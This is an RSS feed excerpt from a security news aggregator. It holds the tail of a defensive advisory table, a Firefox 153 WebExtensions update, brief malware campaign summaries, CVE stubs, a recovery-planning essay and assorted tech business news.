<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Addons Blog: Firefox 153 WebExtensions API updates]]></title>
<description><![CDATA[We had a bumper release of WebExtensions API updates in Firefox 153. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: userScripts.execute() and the new publicSuffix API. We’re covering those con...]]></description>
<link>https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689274/tools/mozilla-addons-blog-firefox-153-webextensions-api-updates/</guid>
<pubDate>Thu, 23 Jul 2026 16:06:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We had a bumper release of <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">WebExtensions API updates in Firefox 153</a>. To start, there is a permissions change that affects how your extensions access local files. We then have two contributions from the community members: <span>userScripts.execute()</span> and the new <span>publicSuffix</span> API. We’re covering those contributions in more depth, including the people behind them, in a separate post. And there is more, read on…</p>
<h3><b>File access now requires a dedicated permission</b></h3>
<p>Extensions that need to read <span>file://</span> URLs used to get that access as part of the “Access your data for all websites” host permission. Starting in Firefox 153, file access is a separate, explicit permission, “Access local files on your computer”, shown in the extension’s permissions settings. It’s off by default for every extension, including ones already installed.</p>
<p>This change has a few concrete effects on code:</p>
<ul>
<li><b>Before:</b> an extension with <span>&lt;all_urls&gt;</span> or a matching host permission could read <span>file://</span> pages without any additional grant, and <span>extension.isAllowedFileSchemeAccess()</span> always returned <span>false</span> regardless of the permission setting.</li>
<li><b>After:</b> the extension must have the new file-access permission granted, and <span>extension.isAllowedFileSchemeAccess()</span> correctly reflects whether the user has granted it.</li>
</ul>
<pre>async function checkFileSchemeAccess() {
  const isAllowed = await browser.extension.isAllowedFileSchemeAccess();

  if (!isAllowed) {
    await browser.notifications.create("file-scheme-access-needed", {
      type: "basic",
      iconUrl: browser.runtime.getURL("icons/icon-48.png"),
      title: "Local file access required",
      message:
        'This extension needs "Allow access to file URLs" enabled to work ' +
        "with local files. Go to about:addons → select this extension → " +
        "turn on that setting, then reload the page.",
    });
    return false;
  }

  return true;
}</pre>
<p><span>devtools.inspectedWindow.eval()</span> calls targeting <span>file://</span> URLs are affected the same way; they now require this permission to succeed.</p>
<p>If your extension depends on <span>file://</span> access, expect existing users to see that access stops after upgrading (until they enable the permission), and consider adding a prompt or fallback path, for example by specifying an embedded options page (<span>options_ui</span>) and calling <span>browser.runtime.openOptionsPage()</span> to open <span>about:addons</span> and including instructions to toggle the setting in the “Permissions and data” tab.</p>
<h3><b>userScripts.execute() and publicSuffix: covered in our next post</b></h3>
<p>Firefox 153 adds two community-contributed APIs:</p>
<ul>
<li><span>userScripts.execute()</span>, which provides for one-off injection of one or more user script sources into a tab or frame, in a defined order, as a complement to the persistent, URL-pattern-based <span>userScripts.register()</span>.</li>
<li><span>publicSuffix</span>, which enables synchronous lookups against the browser’s built-in <a href="https://publicsuffix.org/">Public Suffix List</a> using <span>publicSuffix.isKnownSuffix()</span>, <span>publicSuffix.getKnownSuffix()</span>, and <span>publicSuffix.getDomain()</span>. This API means that extensions no longer need to bundle or maintain a suffix list to determine a hostname’s registrable domain (eTLD+1).</li>
</ul>
<p>Both APIs were built by contributors motivated by real needs in their extensions. We take an in-depth look at these contributions, their developers, impact, and history in a forthcoming post.</p>
<h3><b>documentId support across more APIs</b></h3>
<p>Firefox 153 introduces <span>documentId</span>, a stable identifier for a document instance, including a new <span>runtime.getDocumentId()</span> method, several <span>webNavigation</span> events and methods, <span>webRequest</span> events, scripting injection targets, and the extension messaging APIs.</p>
<p>Many WebExtension APIs use <span>tabId</span> and <span>frameId</span> to identify where to perform an operation. However, because <span>frameId</span> identifies the frame rather than its content, the loaded document can change and the extension’s subsequent operation ends up targeting the new (intended) document. <span>documentId</span> addresses this problem by providing a unique ID for the document. Now, if an extension uses the ID and the frame’s document has changed, the operation fails rather than silently targeting the wrong document.</p>
<p>See <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Work_with_documentId">Work with documentId</a> for the full list of supported events and methods, along with guidance on using it.</p>
<h3><b>Content scripts can read and modify adopted stylesheets</b></h3>
<p>Content scripts can now access <span>document.adoptedStyleSheets</span> and <span>ShadowRoot.adoptedStyleSheets</span> directly.</p>
<pre>const sheet = new CSSStyleSheet();
sheet.replaceSync("* { background: pink; }");
document.adoptedStyleSheets = [sheet];</pre>
<p>This enables extensions to inspect or modify constructed stylesheets from a content script, without using <span>.wrappedJSObject</span>, a workaround that risks interference from the web page.</p>
<h3><b>Theme manifest key: gradients in additional backgrounds</b></h3>
<p>The <span>theme</span> manifest key’s <span>images.additional_backgrounds</span> property now accepts CSS gradients alongside image URLs. A new <span>properties.additional_backgrounds_size</span> property controls the size of each additional background item.</p>
<h3><b>Contextual identities (containers)</b></h3>
<p>If your extension supports contextual identities, you now have access to two new methods: <span>contextualIdentities.getSupportedColors()</span> and <span>contextualIdentities.getSupportedIcons()</span>. These methods return the supported colors and icons, so your extension doesn’t need to hardcode either list.</p>
<p>Also, the colors have been updated to align with the new UI theme: <span>“turquoise”</span> is now <span>“cyan”</span>, <span>“toolbar”</span> is now <span>“gray”</span>, and <span>“violet”</span> has been added. The old names still work for backward compatibility, but your extension should switch to using <span>getSupportedColors()</span> rather than hardcoding either the old or new names.</p>
<h3><b>Add a build-for-amo script</b></h3>
<p>While this isn’t about new APIs, I wanted to mention a change that’s part of our work to make source code review faster and more reliable. When you submit an extension version, AMO now attempts to build your extensions from the submitted source code and compares the result to the package you uploaded. When the two match, reviewers don’t have to verify the build manually. This means submission can move through its review faster.</p>
<p>For now, this applies only if you submit source code that includes a <span>package.json</span> file to build your extension. If your extension has no build step, or you use a different build system, nothing changes. The AMO builder keeps its zero-config approach.</p>
<p>So, if your extension’s source code uses a <span>package.json</span> file, add an <a href="https://docs.npmjs.com/cli/v11/using-npm/scripts">npm script</a> named <span>build-for-amo</span> that runs the commands needed to build your extension for Firefox:</p>
<pre>{
  "scripts": {
    "fx-build": "some commands to build your add-on for Firefox",
    "build-for-amo": "npm run fx-build"
  }
}</pre>
<p>If you’ve a Firefox-specific build command, just point <span>build-for-amo</span> at it. When present, the builder invokes this script instead of guessing how to build your extension. And while you are at it, make sure all your dev dependencies are listed in the <span>package.json</span> file.</p>
<hr>
<p>For more information, including documentation and Bugzilla links, see the <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/153#changes_for_add-on_developers">Changes for add-on developers</a> section of the Firefox 153 for developers release notes on MDN.</p>
<p>As always, file extension-related issues on <a href="https://bugzilla.mozilla.org/">Bugzilla</a> under the WebExtensions product, cross-browser API proposals are discussed in the <a href="https://github.com/w3c/webextensions">W3C WebExtensions Community Group</a>, and questions are welcome on the <a href="https://discourse.mozilla.org/c/add-ons/35">Add-ons Discourse</a>.</p>
<p> </p>
<p>The post <a href="https://blog.mozilla.org/addons/2026/07/23/firefox-153-webextensions-api-updates/">Firefox 153 WebExtensions API updates</a> appeared first on <a href="https://blog.mozilla.org/addons">Mozilla Add-ons Community Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chaos ransomware msaRAT hides its C2 channel inside a legitimate browser process]]></title>
<description><![CDATA[Cisco Talos has identified a Rust-based remote access trojan it attributes to the Chaos ransomware group, named msaRAT after four of the binding names left in the binary. The tool starts its own instance of Chrome or Edge on the…
Read more →
The post Chaos ransomware msaRAT hides its C2 channel i...]]></description>
<link>https://tsecurity.de/de/3688829/it-security-nachrichten/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688829/it-security-nachrichten/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/</guid>
<pubDate>Thu, 23 Jul 2026 13:15:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cisco Talos has identified a Rust-based remote access trojan it attributes to the Chaos ransomware group, named msaRAT after four of the binding names left in the binary. The tool starts its own instance of Chrome or Edge on the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/">Chaos ransomware msaRAT hides its C2 channel inside a legitimate browser process</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chaos ransomware msaRAT hides its C2 channel inside a legitimate browser process]]></title>
<description><![CDATA[Cisco Talos has identified a Rust-based remote access trojan it attributes to the Chaos ransomware group, named msaRAT after four of the binding names left in the binary. The tool starts its own instance of Chrome or Edge on the victim machine and controls it through Chrome DevTools Protocol, a d...]]></description>
<link>https://tsecurity.de/de/3688780/it-security-nachrichten/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688780/it-security-nachrichten/chaos-ransomware-msarat-hides-its-c2-channel-inside-a-legitimate-browser-process/</guid>
<pubDate>Thu, 23 Jul 2026 13:02:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cisco Talos has identified a Rust-based remote access trojan it attributes to the Chaos ransomware group, named msaRAT after four of the binding names left in the binary. The tool starts its own instance of Chrome or Edge on the victim machine and controls it through Chrome DevTools Protocol, a debugging interface built into both browsers. The browser then carries the command-and-control traffic over a WebRTC channel. Once installed, the RAT process keeps all of … <a href="https://www.helpnetsecurity.com/2026/07/23/cisco-talos-chaos-ransomware-msarat/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/23/cisco-talos-chaos-ransomware-msarat/">Chaos ransomware msaRAT hides its C2 channel inside a legitimate browser process</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FakeAgent Campaign: Malicious Claude Artifact Used to Distribute SectopRAT to 29 Organisations]]></title>
<description><![CDATA[Researchers at Huntress have disclosed a malvertising campaign that abused a public artifact hosted on Anthropic’s own claude.ai domain to distribute the SectopRAT information-stealing Trojan, compromising at least 29 organisations in the space of two days. The campaign, which Huntress has named ...]]></description>
<link>https://tsecurity.de/de/3688739/it-security-nachrichten/fakeagent-campaign-malicious-claude-artifact-used-to-distribute-sectoprat-to-29-organisations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688739/it-security-nachrichten/fakeagent-campaign-malicious-claude-artifact-used-to-distribute-sectoprat-to-29-organisations/</guid>
<pubDate>Thu, 23 Jul 2026 12:43:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers at Huntress have disclosed a malvertising campaign that abused a public artifact hosted on Anthropic’s own claude.ai domain to distribute the SectopRAT information-stealing Trojan, compromising at least 29 organisations in the space of two days. The campaign, which Huntress has named FakeAgent, ran between 21 and 22 July 2026. Victims searching for “Claude Desktop […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/23/fakeagent-campaign-malicious-claude-artifact-used-to-distribute-sectoprat-to-29-organisations/">FakeAgent Campaign: Malicious Claude Artifact Used to Distribute SectopRAT to 29 Organisations</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3965 | ffmpeg QuickTime Graphics Video Encoder libavcodec/smcenc.c smc_encode_stream y_size out-of-bounds (EUVD-2022-43297)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in ffmpeg. Affected by this vulnerability is the function smc_encode_stream of the file libavcodec/smcenc.c of the component QuickTime Graphics Video Encoder. Performing a manipulation of the argument y_size results in out-of-bo...]]></description>
<link>https://tsecurity.de/de/3688710/sicherheitsluecken/cve-2022-3965-ffmpeg-quicktime-graphics-video-encoder-libavcodecsmcencc-smcencodestream-ysize-out-of-bounds-euvd-2022-43297/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688710/sicherheitsluecken/cve-2022-3965-ffmpeg-quicktime-graphics-video-encoder-libavcodecsmcencc-smcencodestream-ysize-out-of-bounds-euvd-2022-43297/</guid>
<pubDate>Thu, 23 Jul 2026 12:29:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/ffmpeg">ffmpeg</a>. Affected by this vulnerability is the function <code>smc_encode_stream</code> of the file <em>libavcodec/smcenc.c</em> of the component <em>QuickTime Graphics Video Encoder</em>. Performing a manipulation of the argument <em>y_size</em> results in out-of-bounds read.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3965">CVE-2022-3965</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Principles every enterprise must test before the attack arrives]]></title>
<description><![CDATA[I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.



Imagine this: A major global enterprise, a company mos...]]></description>
<link>https://tsecurity.de/de/3688625/it-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688625/it-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</guid>
<pubDate>Thu, 23 Jul 2026 12:04:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.</p>



<p class="wp-block-paragraph">Imagine this: A major global enterprise, a company most of us interact with indirectly every single day, wakes up to find its entire digital environment obliterated. Thousands of employees in dozens of offices and remote locations are suddenly offline. Customers are cut off, supply chains grind to a halt and regulators are notified with a chilling admission: “We have no idea when we’ll be back.”</p>



<p class="wp-block-paragraph">This wasn’t ransomware. There was no negotiation, no decryption key to buy, no easy way out. It was destruction — deliberate, coordinated and geopolitically motivated — not monetary.</p>



<p class="wp-block-paragraph">As a chief customer officer who’s worked with countless customers on cyberattack risks, my perspective hits a bit differently than a CISO or a CTO. I see the aftermath, not just the attack surface. I see the faces behind the tickets, the operations team locked out of their own systems, the support agent answering panicked calls at dawn. And I ask: How many organizations have actually stress-tested their response to this scenario — not a hypothetical, but this very real, lights-out event? Here’s what every leader needs to confront today:</p>



<h2 class="wp-block-heading">Recovery is not just a technical exercise</h2>



<p class="wp-block-paragraph">The first assumption to break during a real crisis is <a href="https://www.cio.com/article/4165019/your-cloud-strategy-is-incomplete-without-a-cyber-recovery-plan.html">the belief that recovery is purely technical</a>.</p>



<p class="wp-block-paragraph">Many organizations have done tabletop exercises and have a backup and recovery playbook, so they feel prepared. They can <a>point to</a> backup windows, retention schedules and immutability controls. The moment a true blackout happens, a different reality surfaces. The people who own the recovery steps either do not know each other, lack the authority to make decisions without supervisor approval or need guidance from offline systems.</p>



<p class="wp-block-paragraph">The reality is that technical infrastructure almost always holds up better than human infrastructure. Organizations have built their recovery strategy around the assumption that someone competent will be awake, available and empowered when a cyber event happens.</p>



<p class="wp-block-paragraph">Still, backups are only as good as their independence. Let’s be blunt: If your recovery infrastructure shares identity, authentication or network trust with your Microsoft tenant (such as Azure, Microsoft 365 or Teams), you don’t actually have a recovery plan; you have a false sense of one — and a liability. A <a href="https://www.veeam.com/company/press-release/veeam-report-reveals-a-market-wide-shift-from-recovery-confidence-to-proven-data-resilience-amid-ransomware-threats-and-ai-adoption.html">recent survey</a> found that while 90% of organizations express confidence in their ability to recover from a cyber incident, fewer than one in three ransomware victims fully recovered their data.</p>



<p class="wp-block-paragraph">True resilience means immutable, air-gapped backups, untouchable by the same compromise. Anything less is an illusion. I talk to customers about their recovery plans constantly. The customers who have rehearsed all scenarios sleep soundly. Those who haven’t? They’re rolling the dice.</p>



<h2 class="wp-block-heading">Most business continuity plans ignore ‘total blackout’</h2>



<p class="wp-block-paragraph">I’ve reviewed hundreds of business continuity plans. Almost all assume partial failures — a region, an application, a data center. But what if every system, in every country, goes dark simultaneously? That’s an entirely different playbook. If your team hasn’t run a drill for a global, simultaneous outage, you’re not prepared. The probability is low, but the cost of being unready is existential.</p>



<p class="wp-block-paragraph">Connected devices, OT systems, field hardware, partner integrations — they all plug into your enterprise network. When the core collapses, it’s not just IT at risk. It’s operational technology, physical safety systems and in regulated sectors, potentially human lives. Understanding and testing those interdependencies is non-negotiable.</p>



<p class="wp-block-paragraph">This is also where boards need to change the conversation. A <a href="https://www.diligent.com/resources/research/cybersecurity-audit">study found</a> that only 5% of companies have cybersecurity experts on their board of directors. Recovery time objectives (RTOs) should not be buried in technical appendices. It’s all jargon to boards. That makes translation essential. RTOs must be explained in terms of business impact. “We can recover in four hours” is a technical statement. “Every hour of downtime costs us $2.3M and creates regulatory exposure in three jurisdictions” is a board statement.</p>



<p class="wp-block-paragraph">That is the level of clarity leaders need.</p>



<p class="wp-block-paragraph">The most prepared organizations do not wait for an incident to educate the board. They bring the conversation forward proactively. They frame recovery in business terms: revenue, regulatory standing, customer trust and brand reputation.</p>



<p class="wp-block-paragraph">The most effective framing is often simple. Show the most critical systems. Show what happens if each one is down for one hour, four hours, 24 hours and 72 hours. Show the current recovery capability against each and then show the gap.</p>



<p class="wp-block-paragraph">If your board is not demanding real answers, your business continuity strategy is likely underfunded and your business is exposed. This is a risk conversation worth forcing because the consequences do not stay inside IT. They can show up in customer churn or missed revenue and ruin an organization’s reputation.</p>



<h2 class="wp-block-heading">Threat intelligence must be actionable, not archived</h2>



<p class="wp-block-paragraph">Geopolitical attacks, hacktivist campaigns and nation-state targeting aren’t abstract threats. They are active risks, and that intelligence cannot languish in the security team’s inbox. Executive leadership must be looped in — and immediately — so gaps can be closed before they’re exploited. Too often, intelligence enters the security operations function and never reaches the teams responsible for recovery infrastructure or executive decision-making.</p>



<p class="wp-block-paragraph">If a threat actor is targeting a specific class of backup agents, the team responsible for those agents needs to know now, not two weeks from now. If intelligence suggests destructive activity against a sector, recovery owners need to validate isolation, access paths and restoration procedures immediately. If geopolitical tension increases the likelihood of targeting, executive leadership needs to understand what exposure exists and what actions are being taken. The organizations that survive aren’t just the best at incident response. They’re the ones who anticipated, rehearsed and invested <em>before</em> the attack.</p>



<p class="wp-block-paragraph">Part of investing in a recovery strategy requires closing the loop between signal and action. The most prepared organizations have already mapped their critical recovery dependencies to specific threat categories. When intelligence touches one of those categories, there is a named owner and a clear set of actions. No guessing or forwarding emails into the void is needed because the distance between the warning and the employees’ ability to do something is shortened.</p>



<p class="wp-block-paragraph">Looking ahead, the conversation will continue to evolve beyond traditional cyber response. Because in an AI-enabled enterprise, the new question is whether the data within those systems can still be trusted. When AI systems make decisions based on enterprise data, the attack surface becomes the data’s accuracy. A threat actor who quietly corrupts a dataset over 90 days before a recovery event has done more damage than just downtime. They can poison the inputs driving decisions across the business.</p>



<p class="wp-block-paragraph">Regardless of how AI will change threat intelligence and cyber response, these principles remain the same. Know your problem, whether structural or technological. Ensure your human infrastructure keeps pace with your technical infrastructure, with clear cross-functional ownership and the tools and knowledge to act autonomously. Communicate with your boards often — and correctly.</p>



<p class="wp-block-paragraph">Let’s not wait for the next headline to ask, “Are we ready?” Have those conversations <em>now</em>. Test your assumptions. Close your gaps. Because in today’s threat landscape, resilience isn’t IT’s job — it’s everyone’s mandate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50408 | Microsoft Office out-of-bounds (WID-SEC-2026-2317)]]></title>
<description><![CDATA[A vulnerability has been found in Microsoft Office and classified as problematic. This affects an unknown part. Performing a manipulation results in out-of-bounds read.

This vulnerability was named CVE-2026-50408. The attack needs to be approached locally. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3688446/sicherheitsluecken/cve-2026-50408-microsoft-office-out-of-bounds-wid-sec-2026-2317/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688446/sicherheitsluecken/cve-2026-50408-microsoft-office-out-of-bounds-wid-sec-2026-2317/</guid>
<pubDate>Thu, 23 Jul 2026 10:58:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/microsoft:office">Microsoft Office</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part. Performing a manipulation results in out-of-bounds read.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-50408">CVE-2026-50408</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[US teen drops Meta lawsuit on social media addiction days before trial]]></title>
<description><![CDATA[Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claimsA Florida teen whose lawsuit claimed Meta’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in Los Angeles ...]]></description>
<link>https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</guid>
<pubDate>Thu, 23 Jul 2026 10:36:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claims</p><p>A <a href="https://www.theguardian.com/us-news/florida">Florida</a> teen whose lawsuit claimed <a href="https://www.theguardian.com/technology/meta">Meta</a>’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in <a href="https://www.theguardian.com/us-news/los-angeles">Los Angeles</a> was ⁠set to start, his attorneys said on Wednesday. It was the latest in a massive series of high-stakes lawsuits against social media companies for allegedly designing addictive products that lead to the harm of children.</p><p>The lawsuit, brought by a 15-year-old boy known as ⁠RKC, originally named four defendants, Google’s YouTube, Meta’s Instagram, Snap Inc’s ​Snapchat and ByteDance’s <a href="https://www.theguardian.com/us-news/2026/jun/15/florida-sues-tiktok-teen-social-media-access-law">TikTok</a><strong>. </strong>YouTube and TikTok ‌settled in June<strong> </strong>and<strong> </strong>Snap reached a tentative settlement in the case, Bloomberg ‌<a href="https://www.bloomberg.com/news/articles/2026-07-20/snap-nears-settlement-of-addiction-case-ahead-of-jury-trial">reported</a> on Monday. The terms of those settlements were confidential.</p> <a href="https://www.theguardian.com/technology/2026/jul/22/florida-teen-drops-meta-lawsuit">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Store App May Soon Add AI Virtual Shopping Assistant]]></title>
<description><![CDATA[Apple appears to be preparing a new virtual shopping assistant for the Apple Store app, with updated privacy terms revealing how the feature will collect data, personalize responses, and support purchase decisions.



MacRumors spotted a new “Virtual Shopping Assistant” section on the Apple Store...]]></description>
<link>https://tsecurity.de/de/3688269/ios-mac-os/apple-store-app-may-soon-add-ai-virtual-shopping-assistant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688269/ios-mac-os/apple-store-app-may-soon-add-ai-virtual-shopping-assistant/</guid>
<pubDate>Thu, 23 Jul 2026 09:28:53 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple appears to be preparing a new virtual shopping assistant for the Apple Store app, with updated privacy terms revealing how the feature will collect data, personalize responses, and support purchase decisions.



MacRumors spotted a new “Virtual Shopping Assistant” section on the Apple Store App &amp; Privacy page, which explains that Apple will collect account information, device identifiers, carrier details, chat data, and location information when users allow access.



The assistant will use this data to personalize conversations and provide relevant product recommendations inside the Apple Store app. Apple will also save chat transcripts so users can return to earlier conversations, while the company will use the data for business analytics and service improvements.



Apple explains how it will handle chat data



Apple says it will remove personal identifiers before sharing chat content with external partners that help generate conversational responses. The wording suggests that another company may provide part of the AI system, although Apple has not named any partner or model.



Users will have control over whether Apple uses their conversations to improve the assistant. A new Chat Improvements option will appear under Account &gt; Settings in the Apple Store app for users who want to manage this permission.



The privacy policy also suggests that Apple will launch the assistant only in selected regions at first, with wider availability expected later.



Apple has already added an AI chatbot to its Sales Coach app for retail partners, while the company is also testing AI tools that record and summarize Genius Bar sessions. The new shopping assistant appears to be the next step in Apple’s growing use of AI across its retail services.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-59253 | n8n up to 2.27.x Workflow Assignment improper authorization (EUVD-2026-42268)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in n8n up to 2.27.x. Affected by this vulnerability is an unknown functionality of the component Workflow Assignment. Performing a manipulation results in improper authorization.

This vulnerability was named CVE-2026-59253. The attack may be ...]]></description>
<link>https://tsecurity.de/de/3687944/sicherheitsluecken/cve-2026-59253-n8n-up-to-227x-workflow-assignment-improper-authorization-euvd-2026-42268/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687944/sicherheitsluecken/cve-2026-59253-n8n-up-to-227x-workflow-assignment-improper-authorization-euvd-2026-42268/</guid>
<pubDate>Thu, 23 Jul 2026 06:11:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/n8n">n8n up to 2.27.x</a>. Affected by this vulnerability is an unknown functionality of the component <em>Workflow Assignment</em>. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-59253">CVE-2026-59253</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
